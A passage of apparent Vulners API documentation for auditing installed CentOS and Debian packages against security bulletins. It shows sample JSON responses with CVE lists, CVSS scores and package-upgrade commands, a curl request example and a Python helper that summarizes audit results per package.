"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-317.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-317.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2020:3861",
"cvelist": [
"CVE-2019-19126"
],
"cvss": {
"score": 2.1,
"vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2021:0348": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-322.el7_9",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-322.el7_9.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2021:0348",
"cvelist": [
"CVE-2020-10029",
"CVE-2020-29573",
"CVE-2019-25013"
],
"cvss": {
"score": 7.1,
"vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"
},
"fix": "sudo yum -y update glibc-common"
}
]
}
}
[
"CESA-2018:0805",
"CESA-2021:0348",
"CESA-2020:3861",
"CESA-2017:1916",
"CESA-2018:3092",
"CESA-2019:2118"
]
[
"CVE-2016-10739",
"CVE-2015-8776",
"CVE-2014-9402",
"CVE-2020-10029",
"CVE-2017-15670",
"CVE-2020-29573",
"CVE-2018-11237",
"CVE-2015-8777",
"CVE-2018-6485",
"CVE-2015-5180",
"CVE-2015-8779",
"CVE-2017-15804",
"CVE-2015-8778",
"CVE-2018-11236",
"CVE-2017-16997",
"CVE-2017-12132",
"CVE-2019-25013",
"CVE-2014-9761",
"CVE-2019-19126",
"CVE-2018-1000001"
]
"sudo yum -y update glibc-common"
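As an added example (not code from the Vulners documentation or SDK), the script below turns raw rpm -qa / dpkg-query output into the request body for POST /api/v3/audit/audit/ and reduces the audit response to a per-package triage summary (worst CVSS, bulletins, CVEs, fix commands) with an optional score threshold. The package lists and the response are constructed inline from the CentOS fields shown above, and the API key value is a placeholder.

```python
# Constructed sample package lists, in the formats the two commands on this page emit:
#   rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\n'
#   dpkg-query -W -f='${Package} ${Version} ${Architecture}\n'
RPM_OUTPUT = "glibc-common-2.17-157.el7_3.5.x86_64\nbash-4.2.46-34.el7.x86_64\n\n"
DEB_OUTPUT = "uno-libs3 4.3.3-2+deb8u7 amd64\nlibc6 2.19-18+deb8u10 amd64\n"

# Constructed response in the shape os_audit() returns, trimmed to the fields used below
# (values taken from the CentOS example on this page).
SAMPLE_RESPONSE = {
    "packages": {
        "glibc-common-2.17-157.el7_3.5.x86_64": {
            "CESA-2017:1916": [{"cvelist": ["CVE-2015-8776", "CVE-2014-9761"],
                                "cvss": {"score": 7.5}, "fix": "sudo yum -y update glibc-common"}],
            "CESA-2018:3092": [{"cvelist": ["CVE-2018-11237", "CVE-2018-6485"],
                                "cvss": {"score": 9.3}, "fix": "sudo yum -y update glibc-common"}],
        }
    },
    "vulnerabilities": ["CESA-2017:1916", "CESA-2018:3092"],
    "cumulativeFix": "sudo yum -y update glibc-common",
}


def build_audit_request(os_name, os_version, package_output, api_key):
    """Body for POST /api/v3/audit/audit/ from raw rpm/dpkg-query output. Blank lines are
    dropped; other lines pass through untouched, since the API matches the exact string."""
    packages = [line.strip() for line in package_output.splitlines() if line.strip()]
    return {"os": os_name, "version": os_version, "package": packages, "apiKey": api_key}


def summarize_audit(response, min_score=0.0):
    """One row per package: worst CVSS seen, bulletin IDs, CVEs and fix commands.
    Bulletin entries scoring below min_score are ignored so a caller can triage."""
    summary = {}
    for pkg, bulletins in response.get("packages", {}).items():
        worst, ids, cves, fixes = 0.0, set(), set(), set()
        for bulletin_id, reasons in bulletins.items():
            for reason in reasons:
                score = reason.get("cvss", {}).get("score", 0.0)
                if score < min_score:
                    continue
                worst = max(worst, score)
                ids.add(bulletin_id)
                cves.update(reason.get("cvelist", []))
                fixes.add(reason.get("fix"))
        if ids:  # skip packages whose every match fell below the threshold
            summary[pkg] = {"max_cvss": worst, "bulletins": sorted(ids),
                            "cves": sorted(cves), "fix": sorted(fixes - {None})}
    return summary
```

Pass build_audit_request(...) as the JSON body of the curl call shown above, or hand its "package" list to vulners_api.os_audit(); the summary is what a scheduled patch-compliance check would record per host.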
Example for Debian 8. You can use it for any DEB-based OS. Execute the command: dpkg-query -W -f='${Package} ${Version} ${Architecture}\n'
Use its output lines as the package parameter input:
Query:
POST /api/v3/audit/audit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/audit/ -H 'Content-Type: application/json' -d '{
"os": "debian",
"version": "8",
"package": ["uno-libs3 4.3.3-2+deb8u7 amd64"],
"apiKey": "{API key}"
}'
# vulners_api is the VulnersApi client initialized earlier in this guide
debian_vulnerabilities = vulners_api.os_audit(
    os='debian', os_version='8', package=['uno-libs3 4.3.3-2+deb8u7 amd64'])
{
"packages": {
"uno-libs3 4.3.3-2+deb8u7 amd64": {
"DEBIAN:DSA-3608-1:00C2E": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u5",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u5_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3608-1:00C2E",
"cvelist": [
"CVE-2016-4324"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-4111-2:43AFA": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u10",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u10_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4111-2:43AFA",
"cvelist": [
"CVE-2018-6871"
],
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3394-1:77FE6": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u2",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u2_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3394-1:77FE6",
"cvelist": [
"CVE-2015-5214",
"CVE-2015-5212",
"CVE-2015-4551",
"CVE-2015-5213"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3837-1:BCC65": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u7",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u7_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3837-1:BCC65",
"cvelist": [
"CVE-2017-7870"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3236-1:341CA": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u1",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u1_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3236-1:341CA",
"cvelist": [
"CVE-2015-1774"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:BSA-096:958E6": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.2.5-1",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.2.5-1_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:BSA-096:958E6",
"cvelist": [
"CVE-2014-0247"
],
"cvss": {
"score": 10.0,
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-4178-1:A9FA0": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u11",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u11_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4178-1:A9FA0",
"cvelist": [
"CVE-2018-10120",
"CVE-2018-10119"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3792-1:CB086": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u6",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u6_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3792-1:CB086",
"cvelist": [
"CVE-2017-3157"
],
"cvss": {
"score": 4.3,
"vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-4022-1:5372C": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u9",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u9_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4022-1:5372C",
"cvelist": [
"CVE-2017-12607",
"CVE-2017-12608"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3482-1:91A41": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u3",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u3_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3482-1:91A41",
"cvelist": [
"CVE-2016-0794",
"CVE-2016-0795"
],
"cvss": {
"score": 9.3,
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DLA-1669-1:E907A": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u12",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u12_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DLA-1669-1:E907A",
"cvelist": [
"CVE-2018-16858"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DLA-1947-1:BAC22": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u13",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u13_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DLA-1947-1:BAC22",
"cvelist": [
"CVE-2019-9852",
"CVE-2019-9854",
"CVE-2019-9849",
"CVE-2019-9853",
"CVE-2019-9850",
"CVE-2019-9848",
"CVE-2018-16858",
"CVE-2019-9851"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
]
}
},
"vulnerabilities": [
"DEBIAN:DSA-3837-1:BCC65",
"DEBIAN:DLA-1669-1:E907A",
"DEBIAN:BSA-096:958E6",
"DEBIAN:DSA-3482-1:91A41",
"DEBIAN:DSA-4111-2:43AFA",
"DEBIAN:DSA-4178-1:A9FA0",
"DEBIAN:DSA-4022-1:5372C",
"DEBIAN:DSA-3608-1:00C2E",
"DEBIAN:DSA-3792-1:CB086",
"DEBIAN:DSA-3394-1:77FE6",
"DEBIAN:DSA-3236-1:341CA",
"DEBIAN:DLA-1947-1:BAC22"
],
"reasons": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u5",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u5_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3608-1:00C2E",
"cvelist": [
"CVE-2016-4324"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
},
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u10",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u10_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4111-2:43AFA",
"cvelist": [
"CVE-2018-6871"
],
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
},
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u2",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u2_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3394-1:77FE6",
"cvelist": [
"CVE-2015-5214",
"CVE-2015-5212",
"CVE-2015-4551",
"CVE-2015-5213"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
},
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u7",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u7_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3837-1:BCC65",
"cvelist": [
"CVE-2017-7870"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/